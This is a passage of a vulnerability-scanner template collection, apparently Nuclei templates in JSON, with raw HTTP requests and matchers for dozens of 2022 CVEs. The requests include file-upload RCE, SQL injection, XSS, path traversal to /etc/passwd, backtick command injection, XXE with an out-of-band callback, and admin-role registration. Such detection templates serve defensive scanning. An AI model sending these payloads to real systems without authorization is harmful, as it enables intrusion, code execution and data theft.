name=\"atttmp1\"\n\n\n-----------------------------34025600472463336623659912061--\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["<details/open/ontoggle=alert(document.domain)>","clients/listclients.php?"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"csrfToken\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-29464","info":{"name":"WSO2 Management - Arbitrary File Upload & Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /fileupload/toolsAny HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311\nContent-Length: 348\n\n-----------------------------250033711231076532771336998311\nContent-Disposition: form-data; name=\"../../../../repository/deployment/server/webapps/authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp\";filename=\"test.jsp\"\nContent-Type: application/octet-stream\n\n<% out.print(\"WSO2-RCE-CVE-2022-29464\"); %>\n-----------------------------250033711231076532771336998311--\n","GET /authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, 'WSO2-RCE-CVE-2022-29464')"]}]}]},{"id":"CVE-2022-31268","info":{"name":"Gitblit 1.9.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resources//../WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com","gitblit.properties"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1221","info":{"name":"WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script> popup-"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44950","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-25125","info":{"name":"MCMS 5.2.4  - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mdiy/dict/listExcludeApp?query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('{{num}}'),0x7e),1)/**/or/**/1"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-31854","info":{"name":"Codoforum 5.1 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /admin/?page=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryACGPpj7UIqmtLNbB\n\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB--\n","GET /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoLtdjuqj2ixPvBhA\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"site_title\"\n\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"forum_logo\"; filename=\"{{randstr}}.php\"\nContent-Type:  application/x-httpd-php\n\n<?php\n\necho md5('CVE-2022-31854');\n\n?>\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"CSRF_token\"\n\n{{csrf}}\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA--\n","GET /sites/default/assets/img/attachments/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"a63fd49130de6406a66600cd8caa162f\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"CSRF_token\" value=\"([0-9a-zA-Z]+)\"/>"],"internal":true}]}]},{"id":"CVE-2022-35493","info":{"name":"eShop 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["Search Result for \\\"><img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27927","info":{"name":"Microfinance Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23808","info":{"name":"phpMyAdmin < 5.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","<h2>Add a new server</h2>","<title>phpMyAdmin setup"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21500","info":{"name":"Oracle E-Business Suite <=12.2 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp","{{BaseURL}}/OA_HTML/ibeCRgpPrimaryCreate.jsp","{{BaseURL}}/OA_HTML/ibeCRgpIndividualUser.jsp","{{BaseURL}}/OA_HTML/ibeCRgpPartnerPriCreate.jsp"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Registration","Register as individual","<!-- ibeCZzpRuntimeIncl.jsp end -->"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1756","info":{"name":"Newsletter < 7.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=newsletter_main_index&debug&\"><svg/onload=alert(/document.domain/)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"newsletter\") && contains(body, \"><svg/onload=alert(/document.domain/)>\")"],"condition":"and"}]}]},{"id":"CVE-2022-0201","info":{"name":"WordPress Permalink Manager <2.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(/XSS/)>","pm_query"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-28032","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Page Deleted\")"],"condition":"and"}]}]},{"id":"CVE-2022-34121","info":{"name":"CuppaCMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3800","info":{"name":"IBAX - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /api/v2/open/rowsInfo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\norder=1&table_name=pg_user\"%3b+select+pg_sleep(6)%3b+--\"&limit=1&page=1\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"usesysid\")"],"condition":"and"}]}]},{"id":"CVE-2022-3980","info":{"name":"Sophos Mobile managed on-premises - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["@timeout: 50s\nPOST /servlets/OmaDsServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: \"application/xml\"\n\n<?xml version=\"1.0\"?>\n<!DOCTYPE cdl [<!ENTITY % test SYSTEM \"http://{{interactsh-url}}\">%test;]>\n<cdl>test</cdl>\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')","status_code == 400","len(body) == 0"],"condition":"and"}]}]},{"id":"CVE-2022-2733","info":{"name":"Openemr < 7.0.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/interface/login/login.php?site=default\n\nnew_login_session_management=1&languageChoice=1&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /interface/forms/fee_sheet/review/fee_sheet_options_ajax.php?pricelevel=%3Cimg%20src=a%20onerror=alert(document.cookie)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.cookie)>","pricelevel"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0899","info":{"name":"Header Footer Code Manager < 1.1.24 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=hfcm-list&'><script>alert(/document.domain/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(/document.domain/)</script>\")","contains(body_2, \"All Snippets\")"],"condition":"and"}]}]},{"id":"CVE-2022-23348","info":{"name":"BigAnt Server 5.6.06 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Runtime/Data/ms_admin.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_name\";","\"user_pwd\";","\"user_id\";"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0378","info":{"name":"Microweber Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["mwui_init","onmousemove=\"alert(document.domain)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27985","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /alerts/alertLightbox.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nurl=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile&params%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-&params%5Breference%5D=41&uniqueClass=new_content_3983163\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1054","info":{"name":"WordPress RSVP and Event Management <2.7.8 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RSVP Status","\"First Name\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4306","info":{"name":"WordPress Panda Pods Repeater Field <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/panda-pods-repeater-field/fields/pandarepeaterfield.php?itemid=1&podid=1);%20alert(document.domain);/*x&iframe_id=panda-repeater-add-new&success=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"panda-repeater-add-new\")"],"condition":"and"}]}]},{"id":"CVE-2022-43170","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=info_block&is_active=1&sections_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-22733","info":{"name":"Apache ShardingSphere ElasticJob-UI privilege escalation","severity":"medium"},"requests":[{"raw":["POST /api/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccess-Token:\nContent-Type: application/json;charset=UTF-8\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n{\"username\":\"guest\",\"password\":\"guest\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"isGuest\":true","\"accessToken\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0281","info":{"name":"Microweber Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/users/search_authors"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"email\":","\"display_name\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1007","info":{"name":"WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=changeSaved&room=1111%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, '<script>alert(document.domain)</script>')","contains(body_2, 'advanced-booking-calendar')","contains(header_2, 'text/html')","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-0441","info":{"name":"MasterStudy LMS <2.7.6 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"user_login\":\"{{username}}\",\"user_email\":\"{{user_email}}\",\"user_password\":\"{{password}}\",\"user_password_re\":\"{{password}}\",\"become_instructor\":\"\",\"privacy_policy\":true,\"degree\":\"\",\"expertize\":\"\",\"auditory\":\"\",\"additional\":[],\"additional_instructors\":[],\"profile_default_fields_for_register\":{\"wp_capabilities\":{\"value\":{\"administrator\":1}}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Registration completed successfully","\"status\":\"success\""],"condition":"and"},{"type":"word","part":"header_2","words":["application/json;"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"stm_lms_register\":\"([0-9a-z]+)\""],"internal":true},{"type":"kval","kval":["user_email","password"]}]}]},{"id":"CVE-2022-31499","info":{"name":"Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","contains(header, \"text/html\")","status_code == 200","contains(body, '{\\\"CardNo\\\":false')"],"condition":"and"}]}]},{"id":"CVE-2022-0206","info":{"name":"WordPress NewStatPress <1.3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)\")","contains(body_2, \"newstatpress_page\")"],"condition":"and"}]}]},{"id":"CVE-2022-45917","info":{"name":"ILIAS eLearning <7.16 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/shib_logout.php?action=logout&return=https://oast.me","{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://oast.me"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-44951","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/forms&action=save_tab&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&entities_id=24&name=%3cscript%3ealert(document.domain)%3c%2fscript%3e&description=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-29298","info":{"name":"SolarView Compact 6.00 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0169","info":{"name":"Photo Gallery by 10Web < 1.6.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5({{num}}),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22972","info":{"name":"VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /vcac/ HTTP/1.1\nHost: {{Hostname}}\n","GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1\nHost: {{Hostname}}\n","POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1\nHost: {{interactsh-url}}\nContent-type: application/x-www-form-urlencoded\n\nprotected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in\n"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["HZN="]},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"protected_state","group":1,"regex":["id=\"protected_state\" value=\"([a-zA-Z0-9]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"horizonRelayState","group":1,"regex":["name=\"horizonRelayState\" value=\"([a-z0-9-]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstore","group":1,"regex":["id=\"userstore\" value=\"([a-z.]+)\" \\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstoreDisplay","group":1,"regex":["id=\"userstoreDisplay\" readonly class=\"login-input transparent_class\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"regex","name":"stickyConnectorId","group":1,"regex":["name=\"stickyConnectorId\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"kval","name":"HZN-Cookie","kval":["HZN"],"part":"header"}]}]},{"id":"CVE-2022-38131","info":{"name":"RStudio Connect - Open Redirect","severity":"medium"},"requests":[{"raw":["GET //%5coast.me HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[307]}]}]},{"id":"CVE-2022-28923","info":{"name":"Caddy 2.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C%5Cinteract.sh/%252e%252e%252f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-24129","info":{"name":"Shibboleth OIDC OP <3.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["ShibbolethIdp"]}]}]},{"id":"CVE-2022-42747","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&sortDirection=desc&indexFile=1&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-4117","info":{"name":"WordPress IWS Geo Form Fields <=1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"status\\\":200\") && contains(body, \"{\\\"html\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-24223","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nemail={{randstr}}@gmail.com'+AND+(SELECT+2549+FROM+(SELECT(SLEEP(6)))LIzI)+AND+'uqzM'='uqzM&password={{randstr}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Admin Login\") && contains(body, \"Atom.SaveOnBlur\")"],"condition":"and"}]}]},{"id":"CVE-2022-24899","info":{"name":"Contao <4.13.3 - Cross-Site 